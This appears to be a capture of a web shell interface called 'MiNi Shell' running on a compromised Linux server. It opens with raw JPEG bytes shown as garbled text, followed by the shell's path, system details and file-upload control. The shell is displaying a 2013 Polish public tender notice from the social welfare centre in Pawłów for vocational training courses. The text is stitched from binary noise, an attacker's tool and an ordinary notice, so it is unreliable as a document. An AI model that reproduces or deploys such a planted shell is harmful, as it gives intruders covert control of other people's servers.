JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130805/155583-N-2013.html

<p class="kh_header"><b>Pawłów: Usługa w zakresie  organizacji i przeprowadzenia szkoleń i warsztatów   dla  27 uczestników projektu Aktywność = Przyszłość. w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego    Nr umowy UDA-POKL.07.01.01-26-019/08-11 Priorytet: VII. Promocja integracji społecznej , Działanie: 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej,</b><br>
<b>Numer ogłoszenia: 155583 - 2013; data zamieszczenia: 05.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Pawłowie , Pawłów 56, 27-225 Pawłów, woj. świętokrzyskie, tel. 0-41 271 83 50, faks 0-41 271 83 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-pawlow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie  organizacji i przeprowadzenia szkoleń i warsztatów   dla  27 uczestników projektu Aktywność = Przyszłość. w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego    Nr umowy UDA-POKL.07.01.01-26-019/08-11 Priorytet: VII. Promocja integracji społecznej , Działanie: 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem prowadzonego postępowania jest udzielenie zamówienia publicznego na przeprowadzenie nw. szkoleń:
1.Kurs zawodowy sprzedawca z obsługą komputera i kas fiskalnych dla 12 osób   w tym dla 5 osób  z miesięczną  praktyką u pracodawcy zamieszkałych Radkowice , Łomno , Rzepinek, Pawłow, Rzepin Kol. Radkowice ,Łomno ,Szerzawy ,Trzeszków , Jadowniki, Wymiar: 100 godzin
2.Kurs zawodowy:  Mała księgowość dla 3 osób  w tym dla 1osoby  z miesięczną  praktyką dla 1osoby u pracodawcy zamieszkałych: Pawłów, Jadowniki, Wymiar: 80 godzin  
3.Kurs zawodowy Kierowca wózków jezdniowych z napędem silnikowym z wymianą butli gazowej  dla 1 osoby z miesięczną  praktyką u pracodawcy dla1 osoby zamieszkałej : Rzepin Drugi,                                                                                                 wymiar : 67 godzin                                                                                                                 
4.  Kurs zawodowy Operator koparko - ładowarki - III klasa uprawnień dla 2 osób w tym dla 1 osoby  z miesięczną  praktyką u pracodawcy zamieszkałych :   Brzezie, Jawór Nowy
Wymiar: 202 godziny  
5. Kurs zawodowy kucharz z organizacją imprez okolicznościowych dla 3 osób w tym dla 2 osób  z miesięczną  praktyką u pracodawcy zamieszkałych : Grabków, Rzepin Drugi,Łomno  wymiar: 120 godzin
6. Kurs zawodowy Opiekun osób starszych dla 6 osób  zamieszkałych :  Radkowice, Kałków, Świślina, Łomno, Modrzewie, Krajków       wymiar : 100 godzin
II.   Warsztaty szkoleniowe z wizażu, autoprezentacji i kreowania własnego wizerunku w miejscu pracy na spotkanie rekrutacyjne związane z nabyciem zatrudnienia połączony z usługą fryzjerską i kosmetyczną  dla 27 osób (w tym 24 kobiety i 3 mężczyzn) wymiar :  warsztaty indywidualne 1godz. 1 osoba zajęcia indywidualne  =27godzin zajęcia warsztatowe w 3 grupach 9 osobowych x 4 godziny =12 godzin             Razem zajęcia indywidualne i grupowe 39 godzin..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0, 80.57.00.00-0, 85.31.25.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy: 
- posiadają aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy.
- posiadają zezwolenie na prowadzenie kursu Operator koparko - ładowarki - III klasa uprawnień, wydane przez IMBiGS zgodnie z Rozporządzenia Ministra Gospodarki z dnia 20.09.2001 roku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, prowadzili następujące szkolenia 
- 2 szkolenia grupowe - Kurs zawodowy sprzedawca z obsługą komputera i kas fiskalnych  
- 2 szkolenia grupowe - Kurs zawodowy:  Mała księgowość  
- 2 szkolenia grupowe - Kurs zawodowy  Kierowca wózków jezdniowych z napędem   silnikowym z wymianą butli gazowej  
- 2 szkolenia grupowe -  Kurs zawodowy Operator koparko - ładowarki - III klasa uprawnień  
- 2 szkolenia grupowe - Kurs zawodowy kucharz z organizacją imprez okolicznościowych   
- 2 szkolenia grupowe - Kurs zawodowy Opiekun osób starszych  
Szkolenie grupowe to szkolenia dla minimum 5 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy posiadają następujące wyposażenie techniczne dla poszczególnych kursów (wymagania minimalne)  
Kurs zawodowy sprzedawca z obsługą komputera i kas fiskalnych   
1.	Zestaw do prezentacji multimedialnych  (projektor multimedialny+ laptop + ekran, wizualizer) - 1 szt 
2.	Tablica interaktywna - 1 szt
3.	Pracownia komputerowa wyposażona w min.7  stanowisk z niezbędnym oprogramowaniem i dostępem do Internetu.- 1 szt
4.	Drukarka kolorowa - 1 szt. 
5.	Skaner - 1 szt 
6.	Rożne rodzaje kas fiskalnych - 5 szt. 

Kurs zawodowy - Opiekun osób starszych
1.	Zestaw do prezentacji multimedialnych (projektor multimedialny+ laptop + ekran, wizualizer) - 1 szt 
2.	Zestaw audiowizualny (telewizor + odtwarzacz DVD) - 1 szt. 
3.	Fantom osoby dorosłej. 2 szt. 
4.	Leżanki. - 2 szt 
5.	Parawany. - 2 szt
6.	Koce. - 2 szt
7.	Aparaty do mierzenia ciśnienia. - 2 szt
8.	Apteczki pierwszej pomocy. - 2 szt

Kurs zawodowy - Kucharz  z organizacją imprez okolicznościowych
1.	Zestaw do prezentacji multimedialnych (projektor multimedialny+ laptop + ekran, wizualizer) - 1 szt. 
2.	Zestaw audiowizualny (telewizor + odtwarzacz DVD) - 1 szt.
3.	Pracownia gastronomiczna w pełni umeblowana w szafki ze stali nierdzewnej  i wyposażona m.in. w: umywalki wraz ze stołami roboczymi, lodówkę, chłodziarko-zamrażarkę, piec konwekcyjno - parowy, frytkownicę, kuchnie elektryczną, kuchnię elektryczną z piekarnikiem, kontakt grill podwójny, zmywarkę, gofrownicę, szatkownicę, krajalnicę, mikser, wyciskarkę do soku, kruszarkę do lodu, ekspres do kawy, młynek do kawy, maszynkę do mielenia, podgrzewacz do talerzy, mikrofalówkę,  garnki nierdzewne różnej wielkości, sztućce, serwisy obiadowe i kawowe, blachy do pieczenia, durszlaki, sitka, misy, tace, obrusy, skirtingi, serwet itp. - 1 szt. 

Kurs zawodowy - obsługa wózków jezdniowych.
1.	Zestaw do prezentacji multimedialnych  (projektor multimedialny+ laptop + ekran, wizualizer) - 1 szt. 
2.	Zestaw audiowizualny (telewizor + odtwarzacz DVD) - 1 szt.
3.	Wózek widłowy (napęd gazowy). - 1 szt.
4.	Wózek widłowy (napęd spalinowy). - 1 szt.
5.	Palety i pachołki do nauki jazdy i manwrowania wózkiem widłowym (komplet). - 1 szt.

Kurs zawodowy - Operator koparko - ładowarki - III klasa uprawnień
1.	Zestaw do prezentacji multimedialnych  (projektor multimedialny+ laptop + ekran, wizualizer) - 1 szt.
2.	Zestaw audiowizualny (telewizor + odtwarzacz DVD) - 1 szt.
3.	Koparko-ładowarka- 2 szt.

Warsztaty szkoleniowe z wizażu, autoprezentacji i kreowania własnego wizerunku w miejscu pracy na spotkanie rekrutacyjne związane z nabyciem zatrudnienia połączony z usługą fryzjerską i kosmetyczną
1.	Zestaw do prezentacji multimedialnych (projektor multimedialny+ laptop + ekran, wizualizer) - 1 szt.
2.	gabinet kosmetyczny - 1 szt.
3.	Salon  fryzjerski - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy posiadają następujące dysponują osobami zdolnymi do wykonania zamówienia. 
Minimalne wymagania dla poszczególnych kursów: 
1.	Kurs zawodowy sprzedawca z obsługą komputera i kas fiskalnych -  1 osoba posiadająca: wyższe wykształcenie z zakresu informatyki, doświadczenie w prowadzeniu szkoleń z ww zakresu, 1 osoba posiadająca: min. średnie wykształcenie, doświadczenie w prowadzeniu szkoleń z zakresu obsługi kas fiskalnych. Jedna z wymienionych osób musi posiadać uprawnienia pedagogiczne
2.	Mała księgowość - 2 osoby posiadające: wyższe wykształcenie ekonomiczne,  3 letnie doświadczenie w prowadzeniu szkoleń z zakresu księgowości. Jedna z wymienionych osób musi posiadać uprawnienia pedagogiczne
3.	Kurs zawodowy Kierowca wózków jezdniowych z napędem silnikowym z wymianą butli gazowej - 2 osoby z doświadczeniem w prowadzeniu zajęć na kursach Kierowca wózków jezdniowych nabytym w ciągu ostatnich 3 lat. Minimum jedna z ww. osób musi posiadać wykształcenie co najmniej wyższe i minimum jedna przygotowanie pedagogiczne.
4.	Kurs zawodowy Operator koparko - ładowarki - III klasa uprawnień -  3 osoby z doświadczeniem w prowadzeniu szkoleń z zakresu Operator koparko - ładowarki nabytym w ciągu ostatnich 3 lat. Minimum dwie osoby muszą posiadać wykształcenie co najmniej wyższe i przygotowanie pedagogiczne   
5.	Kurs zawodowy kucharz z organizacją imprez okolicznościowych - 1 osoba posiadająca wykształcenie min. średnie w zawodzie kucharz oraz tytuł mistrza w zawodzie, udokumentowane 3 letnie doświadczenie zawodowe oraz w  prowadzeniu szkoleń,                                                                                                     1 osoba  posiadająca wykształcenie wyższe na kierunku związanym z żywieniem człowieka. Minimum 1 osoba musi posiadać przygotowanie pedagogiczne 
6.	Kurs zawodowy Opiekun osób starszych 
-  3 osoby z doświadczeniem  w prowadzeniu szkoleń  zakresu opieki nad osobami starszymi i niepełnosprawnymi nabytym w ciągu ostatnich 3 lat  muszą posiadać   wykształcenie co najmniej wyższe z zakresu  pedagogiki, psychologii, pielęgniarstwa. Minimum dwie osoby muszą posiadać przygotowanie pedagogiczne.
7.	warsztaty szkoleniowe wizażu, autoprezentacji i kreowania własnego wizerunku w miejscu pracy na spotkanie rekrutacyjne związane z nabyciem zatrudnienia połączony z usługą fryzjerską i kosmetyczną  -   1osoba posiadająca wykształcenie min. średnie w zawodzie  oraz tytuł mistrza w zawodzie fryzjer i 3 letnie doświadczenie zawodowe, 1 osoba posiadająca wykształcenie min. średnie w zawodzie  oraz tytuł mistrza w zawodzie kosmetyczka i 3 letnie doświadczenie zawodowe, 1 osoba posiadająca wykształcenie min. Średnie ze znajomością aktualnych trendów dot. Stylizacji ,wizażu,  kreowania wizerunku i udokumentowane 3 letnie doświadczenie zawodowe oraz w  prowadzeniu szkoleń z zakresu podanego w SIWZ  Jedna z wymienionych osób musi posiadać uprawnienia pedagogiczne</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy posiadają nie mniej niż  -  70 000,00 PLN własnych środków lub zdolność kredytową w tej samej wysokości.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 55</li>
<li>2 - Doświadczenie w ilości przeprowadzonych szkoleń grupowych - 30</li>
<li>3 - Posiadany certyfikat w zakresie jakości usług szkoleniowych - 5</li>
<li>4 - Akredytacja Kuratora Oświaty na szkolenia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy na skutek zmian technicznych i organizacyjnych, spowodowanych następującymi okolicznościami;
1)	Zmiana wykazanego do zajęć praktycznych pojazdu, maszyny budowlanej , sprzętu informatycznego, innych pomocy dydaktycznych. Zmieniony pojazd, maszyna budowlana , sprzęt informatyczny, inne pomoce dydaktyczne mają posiadać parametry tożsame lub lepsze od przyjętych w ofercie. Zamiana następuje za zgodą zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu wykonawca.
2)	Zamiana wskazanego w ofercie wykładowcy tylko na wykładowcę o kwalifikacjach i doświadczeniu tożsamym lub lepszym. Zamiana następuje za zgodą zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu wykonawca.
3)	Zmiana wskazanego w ofercie miejsca odbywania praktyk u pracodawcy tylko w przypadku zawieszenia   , upadku lub likwidacji działalności gospodarczej
4)	Zmiana lokalu wskazanego w ofercie do zajęć szkoleniowych tylko w przypadku klęski żywiołowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina-pawlow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Pawłowie 
Pawłów 56
27-225 Pawłów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2013 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Pawłowie 
Pawłów 56
27-225 Pawłów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienia częściowo finansowane ze środków Unii Europejskiej. Projekt    Aktywność = Przyszłość. w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego    Nr umowy UDA- POKL.07.01.01-26-019/08-11 Priorytet: VII. Promocja integracji społecznej , Działanie: 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com